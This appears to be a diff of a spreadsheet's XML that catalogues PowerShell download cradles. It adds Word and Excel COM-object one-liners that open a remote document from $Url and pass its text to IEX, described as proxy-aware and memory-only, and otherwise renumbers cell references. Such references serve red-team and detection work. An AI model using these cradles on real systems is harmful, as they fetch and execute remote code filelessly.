+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <i/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>$comWord=New-Object -ComObject Word.Application;While($comWord.Busy){Start-Sleep -Seconds 1}$comWord.Visible=$False;$doc=$comWord.Documents.Open($Url);While($comWord.Busy){Start-Sleep -Seconds 1}IEX($doc.Content.Text);$comWord.Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($comWord)</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+Powershell version: 2+
+Microsoft Word installed
+Proxy aware
+memory only</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>PowerShell Excel COM Object:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <i/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>$comExcel=New-Object -ComObject Excel.Application;While($comExcel.Busy){Start-Sleep -Seconds 1}$comExcel.DisplayAlerts=$False;$Null=$comExcel.Workbooks.Open($Url[0]);While($comExcel.Busy){Start-Sleep -Seconds 1}IEX(($comExcel.Sheets.Item(1).Range("A1:R"+$comExcel.Sheets.Item(1).UsedRange.Rows.Count).Value2|?{$_})-Join"`n");$comExcel.Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($comExcel)</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+Powershell version: 2+
+Microsoft Excel installed
+Proxy aware
+memory only</t>
     </r>
   </si>
 </sst>
@@ -10470,22 +10460,22 @@
   <sheetData>
     <row r="1" spans="1:1" ht="152">
       <c r="A1" s="3" t="s">
-        <v>74</v>
+        <v>68</v>
       </c>
     </row>
     <row r="2" spans="1:1" ht="104">
       <c r="A2" s="4" t="s">
-        <v>220</v>
+        <v>209</v>
       </c>
     </row>
     <row r="3" spans="1:1" ht="200">
       <c r="A3" s="3" t="s">
-        <v>155</v>
+        <v>144</v>
       </c>
     </row>
     <row r="4" spans="1:1" ht="120">
       <c r="A4" s="3" t="s">
-        <v>156</v>
+        <v>145</v>
       </c>
     </row>
     <row r="5" spans="1:1" ht="24">
@@ -10539,10 +10529,10 @@
         <v>18</v>
       </c>
       <c r="B1" s="25" t="s">
-        <v>149</v>
+        <v>138</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>109</v>
+        <v>98</v>
       </c>
       <c r="D1" s="25" t="s">
         <v>44</v>
@@ -10580,10 +10570,10 @@
     </row>
     <row r="4" spans="1:10" ht="52" customHeight="1">
       <c r="A4" s="14" t="s">
-        <v>112</v>
+        <v>101</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>152</v>
+        <v>141</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
@@ -10594,16 +10584,16 @@
     </row>
     <row r="5" spans="1:10">
       <c r="A5" s="13" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
     </row>
     <row r="6" spans="1:10">
@@ -10625,41 +10615,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="44" t="s">
-        <v>178</v>
+        <v>167</v>
       </c>
       <c r="C7" s="7" t="s">
-        <v>218</v>
+        <v>207</v>
       </c>
       <c r="D7" s="27" t="s">
-        <v>212</v>
+        <v>201</v>
       </c>
     </row>
     <row r="8" spans="1:10" ht="32">
       <c r="A8" s="13" t="s">
-        <v>72</v>
+        <v>66</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>122</v>
+        <v>111</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>122</v>
+        <v>111</v>
       </c>
       <c r="D8" s="7" t="s">
-        <v>122</v>
+        <v>111</v>
       </c>
     </row>
     <row r="9" spans="1:10" ht="276">
       <c r="A9" s="13" t="s">
-        <v>73</v>
+        <v>67</v>
       </c>
       <c r="B9" s="44" t="s">
-        <v>177</v>
+        <v>166</v>
       </c>
       <c r="C9" s="27" t="s">
-        <v>125</v>
+        <v>114</v>
       </c>
       <c r="D9" s="44" t="s">
-        <v>113</v>
+        <v>102</v>
       </c>
     </row>
   </sheetData>
@@ -10691,10 +10681,10 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>149</v>
+        <v>138</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>109</v>
+        <v>98</v>
       </c>
       <c r="D1" s="25" t="s">
         <v>44</v>
@@ -10730,10 +10720,10 @@
     </row>
     <row r="4" spans="1:4" ht="32">
       <c r="A4" s="14" t="s">
-        <v>112</v>
+        <v>101</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>152</v>
+        <v>141</v>
       </c>
       <c r="C4" s="42"/>
       <c r="D4" s="43" t="s">
@@ -10742,16 +10732,16 @@
     </row>
     <row r="5" spans="1:4" s="9" customFormat="1">
       <c r="A5" s="13" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
     </row>
     <row r="6" spans="1:4">
@@ -10773,38 +10763,38 @@
         <v>8</v>
       </c>
       <c r="B7" s="54" t="s">
-        <v>179</v>
+        <v>168</v>
       </c>
       <c r="C7" s="36" t="s">
-        <v>180</v>
+        <v>169</v>
       </c>
       <c r="D7" s="36" t="s">
-        <v>213</v>
+        <v>202</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="32">
       <c r="A8" s="13" t="s">
-        <v>72</v>
+        <v>66</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>122</v>
+        <v>111</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>122</v>
+        <v>111</v>
       </c>
       <c r="D8" s="7" t="s">
-        <v>122</v>
+        <v>111</v>
       </c>
     </row>
     <row r="9" spans="1:4" ht="276">
       <c r="A9" s="13" t="s">
-        <v>73</v>
+        <v>67</v>
       </c>
       <c r="B9" s="44" t="s">
-        <v>177</v>
+        <v>166</v>
       </c>
       <c r="C9" s="27" t="s">
-        <v>126</v>
+        <v>115</v>
       </c>
       <c r="D9" s="44" t="s">
         <v>56</v>
@@ -10842,10 +10832,10 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>149</v>
+        <v>138</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>109</v>
+        <v>98</v>
       </c>
       <c r="D1" s="25" t="s">
         <v>44</v>
@@ -10856,13 +10846,13 @@
         <v>5</v>
       </c>
       <c r="B2" s="27" t="s">
-        <v>98</v>
+        <v>90</v>
       </c>
       <c r="C2" s="27" t="s">
-        <v>98</v>
+        <v>90</v>
       </c>
       <c r="D2" s="27" t="s">
-        <v>98</v>
+        <v>90</v>
       </c>
     </row>
     <row r="3" spans="1:4" ht="48">
@@ -10881,10 +10871,10 @@
     </row>
     <row r="4" spans="1:4" ht="32">
       <c r="A4" s="14" t="s">
-        <v>112</v>
+        <v>101</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>152</v>
+        <v>141</v>
       </c>
       <c r="C4" s="42"/>
       <c r="D4" s="43" t="s">
@@ -10893,16 +10883,16 @@
     </row>
     <row r="5" spans="1:4" s="9" customFormat="1">
       <c r="A5" s="13" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
     </row>
     <row r="6" spans="1:4" ht="208">
@@ -10910,13 +10900,13 @@
         <v>7</v>
       </c>
       <c r="B6" s="7" t="s">
-        <v>182</v>
+        <v>171</v>
       </c>
       <c r="C6" s="7" t="s">
-        <v>129</v>
+        <v>118</v>
       </c>
       <c r="D6" s="7" t="s">
-        <v>78</v>
+        <v>72</v>
       </c>
     </row>
     <row r="7" spans="1:4" ht="390" customHeight="1">
@@ -10924,41 +10914,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="57" t="s">
-        <v>183</v>
+        <v>172</v>
       </c>
       <c r="C7" s="36" t="s">
-        <v>217</v>
+        <v>206</v>
       </c>
       <c r="D7" s="36" t="s">
-        <v>214</v>
+        <v>203</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="288">
       <c r="A8" s="13" t="s">
-        <v>72</v>
+        <v>66</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>184</v>
+        <v>173</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>130</v>
+        <v>119</v>
       </c>
       <c r="D8" s="7" t="s">
-        <v>75</v>
+        <v>69</v>
       </c>
     </row>
     <row r="9" spans="1:4" ht="276">
       <c r="A9" s="13" t="s">
-        <v>73</v>
+        <v>67</v>
       </c>
       <c r="B9" s="44" t="s">
-        <v>177</v>
+        <v>166</v>
       </c>
       <c r="C9" s="44" t="s">
-        <v>177</v>
+        <v>166</v>
       </c>
       <c r="D9" s="44" t="s">
-        <v>76</v>
+        <v>70</v>
       </c>
     </row>
     <row r="25" spans="4:4">
@@ -10992,10 +10982,10 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>149</v>
+        <v>138</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>109</v>
+        <v>98</v>
       </c>
       <c r="D1" s="25" t="s">
         <v>44</v>
@@ -11006,13 +10996,13 @@
         <v>5</v>
       </c>
       <c r="B2" s="27" t="s">
-        <v>77</v>
+        <v>71</v>
       </c>
       <c r="C2" s="27" t="s">
-        <v>77</v>
+        <v>71</v>
       </c>
       <c r="D2" s="27" t="s">
-        <v>77</v>
+        <v>71</v>
       </c>
     </row>
     <row r="3" spans="1:4" ht="48">
@@ -11031,10 +11021,10 @@
     </row>
     <row r="4" spans="1:4" ht="32">
       <c r="A4" s="14" t="s">
-        <v>112</v>
+        <v>101</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>152</v>
+        <v>141</v>
       </c>
       <c r="C4" s="42"/>
       <c r="D4" s="43" t="s">
@@ -11043,16 +11033,16 @@
     </row>
     <row r="5" spans="1:4" s="9" customFormat="1">
       <c r="A5" s="13" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
     </row>
     <row r="6" spans="1:4">
@@ -11074,41 +11064,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="56" t="s">
-        <v>181</v>
+        <v>170</v>
       </c>
       <c r="C7" s="27" t="s">
-        <v>216</v>
+        <v>205</v>
       </c>
       <c r="D7" s="36" t="s">
-        <v>215</v>
+        <v>204</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="48">
       <c r="A8" s="13" t="s">
-        <v>72</v>
+        <v>66</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>122</v>
+        <v>111</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>122</v>
+        <v>111</v>
       </c>
       <c r="D8" s="7" t="s">
-        <v>89</v>
+        <v>82</v>
       </c>
     </row>
     <row r="9" spans="1:4" ht="276">
       <c r="A9" s="13" t="s">
-        <v>73</v>
+        <v>67</v>
       </c>
       <c r="B9" s="44" t="s">
-        <v>177</v>
+        <v>166</v>
       </c>
       <c r="C9" s="36" t="s">
-        <v>127</v>
+        <v>116</v>
       </c>
       <c r="D9" s="27" t="s">
-        <v>128</v>
+        <v>117</v>
       </c>
     </row>
   </sheetData>
@@ -11138,10 +11128,10 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>149</v>
+        <v>138</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>109</v>
+        <v>98</v>
       </c>
       <c r="D1" s="45" t="s">
         <v>44</v>
@@ -11177,10 +11167,10 @@
     </row>
     <row r="4" spans="1:4" ht="48">
       <c r="A4" s="14" t="s">
-        <v>112</v>
+        <v>101</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>186</v>
+        <v>175</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
@@ -11191,13 +11181,13 @@
     </row>
     <row r="5" spans="1:4" s="9" customFormat="1">
       <c r="A5" s="13" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>84</v>
+        <v>78</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>84</v>
+        <v>78</v>
       </c>
       <c r="D5" s="45" t="s">
         <v>47</v>
@@ -11222,10 +11212,10 @@
         <v>8</v>
       </c>
       <c r="B7" s="54" t="s">
-        <v>187</v>
+        <v>176</v>
       </c>
       <c r="C7" s="47" t="s">
-        <v>221</v>
+        <v>210</v>
       </c>
       <c r="D7" s="45" t="s">
         <v>47</v>
@@ -11233,7 +11223,7 @@
     </row>
     <row r="8" spans="1:4" ht="32">
       <c r="A8" s="13" t="s">
-        <v>72</v>
+        <v>66</v>
       </c>
       <c r="B8" s="43" t="s">
         <v>24</v>
@@ -11247,13 +11237,13 @@
     </row>
     <row r="9" spans="1:4">
       <c r="A9" s="13" t="s">
-        <v>73</v>
+        <v>67</v>
       </c>
       <c r="B9" s="43" t="s">
-        <v>67</v>
+        <v>61</v>
       </c>
       <c r="C9" s="43" t="s">
-        <v>67</v>
+        <v>61</v>
       </c>
       <c r="D9" s="45" t="s">
         <v>47</v>
@@ -11287,10 +11277,10 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>149</v>
+        <v>138</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>109</v>
+        <v>98</v>
       </c>
       <c r="D1" s="25" t="s">
         <v>44</v>
@@ -11321,12 +11311,12 @@
         <v>25</v>
       </c>
       <c r="D3" s="43" t="s">
-        <v>95</v>
+        <v>87</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="48">
       <c r="A4" s="14" t="s">
-        <v>112</v>
+        <v>101</v>
       </c>
       <c r="B4" s="10" t="s">
         <v>19</v>
@@ -11340,16 +11330,16 @@
     </row>
     <row r="5" spans="1:4" s="9" customFormat="1">
       <c r="A5" s="13" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>84</v>
+        <v>78</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>84</v>
+        <v>78</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>84</v>
+        <v>78</v>
       </c>
     </row>
     <row r="6" spans="1:4" ht="64">
@@ -11371,18 +11361,18 @@
         <v>8</v>
       </c>
       <c r="B7" s="54" t="s">
-        <v>189</v>
+        <v>178</v>
       </c>
       <c r="C7" s="47" t="s">
-        <v>188</v>
+        <v>177</v>
       </c>
       <c r="D7" s="36" t="s">
-        <v>222</v>
+        <v>211</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="32">
       <c r="A8" s="13" t="s">
-        <v>72</v>
+        <v>66</v>
       </c>
       <c r="B8" s="43" t="s">
         <v>24</v>
@@ -11396,16 +11386,16 @@
     </row>
     <row r="9" spans="1:4">
       <c r="A9" s="13" t="s">
-        <v>73</v>
+        <v>67</v>
       </c>
       <c r="B9" s="43" t="s">
-        <v>134</v>
+        <v>123</v>
       </c>
       <c r="C9" s="43" t="s">
-        <v>134</v>
+        <v>123</v>
       </c>
       <c r="D9" s="43" t="s">
-        <v>68</v>
+        <v>62</v>
       </c>
     </row>
   </sheetData>
@@ -11438,10 +11428,10 @@
         <v>18</v>
       </c>
       <c r="B1" s="25" t="s">
-        <v>149</v>
+        <v>138</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>109</v>
+        <v>98</v>
       </c>
       <c r="D1" s="25" t="s">
         <v>44</v>
@@ -11472,15 +11462,15 @@
         <v>15</v>
       </c>
       <c r="D3" s="49" t="s">
-        <v>96</v>
+        <v>88</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="48">
       <c r="A4" s="14" t="s">
-        <v>112</v>
+        <v>101</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>168</v>
+        <v>157</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
@@ -11491,16 +11481,16 @@
     </row>
     <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>83</v>
+        <v>77</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>83</v>
+        <v>77</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>83</v>
+        <v>77</v>
       </c>
     </row>
     <row r="6" spans="1:4" ht="64">
@@ -11508,13 +11498,13 @@
         <v>7</v>
       </c>
       <c r="B6" s="17" t="s">
-        <v>144</v>
+        <v>133</v>
       </c>
       <c r="C6" s="17" t="s">
-        <v>144</v>
+        <v>133</v>
       </c>
       <c r="D6" s="17" t="s">
-        <v>144</v>
+        <v>133</v>
       </c>
     </row>
     <row r="7" spans="1:4" ht="409.6">
@@ -11522,41 +11512,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="27" t="s">
-        <v>190</v>
+        <v>179</v>
       </c>
       <c r="C7" s="26" t="s">
-        <v>146</v>
+        <v>135</v>
       </c>
       <c r="D7" s="27" t="s">
-        <v>223</v>
+        <v>212</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="162">
       <c r="A8" s="13" t="s">
-        <v>72</v>
+        <v>66</v>
       </c>
       <c r="B8" s="27" t="s">
-        <v>191</v>
+        <v>180</v>
       </c>
       <c r="C8" s="53" t="s">
-        <v>192</v>
+        <v>181</v>
       </c>
       <c r="D8" s="27" t="s">
-        <v>145</v>
+        <v>134</v>
       </c>
     </row>
     <row r="9" spans="1:4">
       <c r="A9" s="13" t="s">
-        <v>73</v>
+        <v>67</v>
       </c>
       <c r="B9" s="17" t="s">
-        <v>147</v>
+        <v>136</v>
       </c>
       <c r="C9" s="17" t="s">
-        <v>147</v>
+        <v>136</v>
       </c>
       <c r="D9" s="17" t="s">
-        <v>147</v>
+        <v>136</v>
       </c>
     </row>
   </sheetData>
@@ -11587,10 +11577,10 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>149</v>
+        <v>138</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>109</v>
+        <v>98</v>
       </c>
       <c r="D1" s="25" t="s">
         <v>44</v>
@@ -11621,15 +11611,15 @@
         <v>34</v>
       </c>
       <c r="D3" s="42" t="s">
-        <v>97</v>
+        <v>89</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="48">
       <c r="A4" s="14" t="s">
-        <v>112</v>
+        <v>101</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>185</v>
+        <v>174</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
@@ -11640,16 +11630,16 @@
     </row>
     <row r="5" spans="1:4" s="9" customFormat="1">
       <c r="A5" s="13" t="s">
+        <v>73</v>
+      </c>
+      <c r="B5" s="7" t="s">
         <v>79</v>
       </c>
-      <c r="B5" s="7" t="s">
-        <v>85</v>
-      </c>
       <c r="C5" s="7" t="s">
-        <v>85</v>
+        <v>79</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>85</v>
+        <v>79</v>
       </c>
     </row>
     <row r="6" spans="1:4">
@@ -11671,41 +11661,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="4" t="s">
-        <v>193</v>
+        <v>182</v>
       </c>
       <c r="C7" s="47" t="s">
-        <v>140</v>
+        <v>129</v>
       </c>
       <c r="D7" s="36" t="s">
-        <v>224</v>
+        <v>213</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="80">
       <c r="A8" s="13" t="s">
-        <v>72</v>
+        <v>66</v>
       </c>
       <c r="B8" s="43" t="s">
-        <v>194</v>
+        <v>183</v>
       </c>
       <c r="C8" s="43" t="s">
-        <v>141</v>
+        <v>130</v>
       </c>
       <c r="D8" s="43" t="s">
-        <v>142</v>
+        <v>131</v>
       </c>
     </row>
     <row r="9" spans="1:4">
       <c r="A9" s="13" t="s">
-        <v>73</v>
+        <v>67</v>
       </c>
       <c r="B9" s="7" t="s">
-        <v>143</v>
+        <v>132</v>
       </c>
       <c r="C9" s="7" t="s">
-        <v>143</v>
+        <v>132</v>
       </c>
       <c r="D9" s="7" t="s">
-        <v>143</v>
+        <v>132</v>
       </c>
     </row>
   </sheetData>
@@ -11736,10 +11726,10 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>149</v>
+        <v>138</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>109</v>
+        <v>98</v>
       </c>
       <c r="D1" s="25" t="s">
         <v>44</v>
@@ -11770,15 +11760,15 @@
         <v>34</v>
       </c>
       <c r="D3" s="42" t="s">
-        <v>97</v>
+        <v>89</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="48">
       <c r="A4" s="14" t="s">
-        <v>112</v>
+        <v>101</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>185</v>
+        <v>174</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
@@ -11789,16 +11779,16 @@
     </row>
     <row r="5" spans="1:4" s="9" customFormat="1">
       <c r="A5" s="13" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>86</v>
+        <v>80</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>86</v>
+        <v>80</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>86</v>
+        <v>80</v>
       </c>
     </row>
     <row r="6" spans="1:4" ht="64">
@@ -11820,32 +11810,32 @@
         <v>8</v>
       </c>
       <c r="B7" s="4" t="s">
-        <v>195</v>
+        <v>184</v>
       </c>
       <c r="C7" s="47" t="s">
-        <v>138</v>
+        <v>127</v>
       </c>
       <c r="D7" s="36" t="s">
-        <v>225</v>
+        <v>214</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="112">
       <c r="A8" s="13" t="s">
-        <v>72</v>
+        <v>66</v>
       </c>
       <c r="B8" s="43" t="s">
-        <v>196</v>
+        <v>185</v>
       </c>
       <c r="C8" s="43" t="s">
-        <v>139</v>
+        <v>128</v>
       </c>
       <c r="D8" s="36" t="s">
-        <v>71</v>
+        <v>65</v>
       </c>
     </row>
     <row r="9" spans="1:4" ht="48">
       <c r="A9" s="13" t="s">
-        <v>73</v>
+        <v>67</v>
       </c>
       <c r="B9" s="43" t="s">
         <v>36</v>
@@ -11854,7 +11844,7 @@
         <v>36</v>
       </c>
       <c r="D9" s="43" t="s">
-        <v>69</v>
+        <v>63</v>
       </c>
     </row>
   </sheetData>
@@ -11886,10 +11876,10 @@
         <v>18</v>
       </c>
       <c r="B1" s="25" t="s">
-        <v>149</v>
+        <v>138</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>109</v>
+        <v>98</v>
       </c>
       <c r="D1" s="25" t="s">
         <v>44</v>
@@ -11939,16 +11929,16 @@
     </row>
     <row r="5" spans="1:4" s="9" customFormat="1">
       <c r="A5" s="13" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>87</v>
+        <v>81</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>87</v>
+        <v>81</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>87</v>
+        <v>81</v>
       </c>
     </row>
     <row r="6" spans="1:4" ht="64">
@@ -11981,7 +11971,7 @@
     </row>
     <row r="8" spans="1:4">
       <c r="A8" s="13" t="s">
-        <v>72</v>
+        <v>66</v>
       </c>
       <c r="B8" s="48" t="s">
         <v>0</v>
@@ -11995,7 +11985,7 @@
     </row>
     <row r="9" spans="1:4">
       <c r="A9" s="13" t="s">
-        <v>73</v>
+        <v>67</v>
       </c>
       <c r="B9" s="47" t="s">
         <v>36</v>
@@ -12018,8 +12008,8 @@
   <dimension ref="A1:M37"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
-      <pane ySplit="1" topLeftCell="A8" activePane="bottomLeft" state="frozen"/>
-      <selection pane="bottomLeft" activeCell="A12" sqref="A12"/>
+      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
+      <selection pane="bottomLeft"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
@@ -12054,10 +12044,10 @@
     </row>
     <row r="2" spans="1:13" ht="352">
       <c r="A2" s="10" t="s">
-        <v>104</v>
+        <v>95</v>
       </c>
       <c r="B2" s="6" t="s">
-        <v>114</v>
+        <v>103</v>
       </c>
     </row>
     <row r="3" spans="1:13" ht="7" customHeight="1">
@@ -12066,10 +12056,10 @@
     </row>
     <row r="4" spans="1:13" ht="224">
       <c r="A4" s="10" t="s">
-        <v>105</v>
+        <v>96</v>
       </c>
       <c r="B4" s="6" t="s">
-        <v>115</v>
+        <v>104</v>
       </c>
       <c r="M4" s="29"/>
     </row>
@@ -12079,10 +12069,10 @@
     </row>
     <row r="6" spans="1:13" ht="208">
       <c r="A6" s="26" t="s">
-        <v>106</v>
+        <v>227</v>
       </c>
       <c r="B6" s="17" t="s">
-        <v>172</v>
+        <v>161</v>
       </c>
       <c r="M6" s="32"/>
     </row>
@@ -12092,10 +12082,10 @@
     </row>
     <row r="8" spans="1:13" ht="192">
       <c r="A8" s="26" t="s">
-        <v>107</v>
+        <v>226</v>
       </c>
       <c r="B8" s="17" t="s">
-        <v>171</v>
+        <v>160</v>
       </c>
       <c r="M8" s="33"/>
     </row>
@@ -12105,10 +12095,10 @@
     </row>
     <row r="10" spans="1:13" ht="144">
       <c r="A10" s="26" t="s">
-        <v>58</v>
+        <v>225</v>
       </c>
       <c r="B10" s="17" t="s">
-        <v>173</v>
+        <v>162</v>
       </c>
       <c r="M10" s="32"/>
     </row>
@@ -12118,10 +12108,10 @@
     </row>
     <row r="12" spans="1:13" ht="112">
       <c r="A12" s="26" t="s">
-        <v>102</v>
+        <v>224</v>
       </c>
       <c r="B12" s="17" t="s">
-        <v>174</v>
+        <v>163</v>
       </c>
       <c r="M12" s="32"/>
     </row>
@@ -12131,10 +12121,10 @@
     </row>
     <row r="14" spans="1:13" ht="112">
       <c r="A14" s="10" t="s">
-        <v>59</v>
+        <v>223</v>
       </c>
       <c r="B14" s="17" t="s">
-        <v>174</v>
+        <v>163</v>
       </c>
     </row>
     <row r="15" spans="1:13" ht="7" customHeight="1">
@@ -12143,10 +12133,10 @@
     </row>
     <row r="16" spans="1:13" ht="128">
       <c r="A16" s="27" t="s">
-        <v>60</v>
+        <v>58</v>
       </c>
       <c r="B16" s="6" t="s">
-        <v>131</v>
+        <v>120</v>
       </c>
     </row>
     <row r="17" spans="1:2" ht="7" customHeight="1">
@@ -12155,10 +12145,10 @@
     </row>
     <row r="18" spans="1:2" ht="128">
       <c r="A18" s="27" t="s">
-        <v>61</v>
+        <v>59</v>
       </c>
       <c r="B18" s="6" t="s">
-        <v>131</v>
+        <v>120</v>
       </c>
     </row>
     <row r="19" spans="1:2" ht="7" customHeight="1">
@@ -12167,10 +12157,10 @@
     </row>
     <row r="20" spans="1:2" ht="208">
       <c r="A20" s="46" t="s">
-        <v>88</v>
+        <v>216</v>
       </c>
       <c r="B20" s="6" t="s">
-        <v>132</v>
+        <v>121</v>
       </c>
     </row>
     <row r="21" spans="1:2" ht="7" customHeight="1">
@@ -12179,10 +12169,10 @@
     </row>
     <row r="22" spans="1:2" ht="409.6">
       <c r="A22" s="27" t="s">
-        <v>90</v>
+        <v>217</v>
       </c>
       <c r="B22" s="6" t="s">
-        <v>133</v>
+        <v>122</v>
       </c>
     </row>
     <row r="23" spans="1:2" ht="7" customHeight="1">
@@ -12191,22 +12181,22 @@
     </row>
     <row r="24" spans="1:2" ht="128">
       <c r="A24" s="35" t="s">
-        <v>23</v>
+        <v>218</v>
       </c>
       <c r="B24" s="17" t="s">
-        <v>148</v>
+        <v>137</v>
       </c>
     </row>
     <row r="25" spans="1:2" ht="7" customHeight="1">
       <c r="A25" s="37"/>
       <c r="B25" s="38"/>
     </row>
-    <row r="26" spans="1:2" ht="96">
+    <row r="26" spans="1:2" ht="112">
       <c r="A26" s="36" t="s">
-        <v>62</v>
+        <v>219</v>
       </c>
       <c r="B26" s="36" t="s">
-        <v>135</v>
+        <v>124</v>
       </c>
     </row>
     <row r="27" spans="1:2" ht="7" customHeight="1">
@@ -12215,22 +12205,22 @@
     </row>
     <row r="28" spans="1:2" ht="96">
       <c r="A28" s="36" t="s">
-        <v>63</v>
+        <v>220</v>
       </c>
       <c r="B28" s="36" t="s">
-        <v>136</v>
+        <v>125</v>
       </c>
     </row>
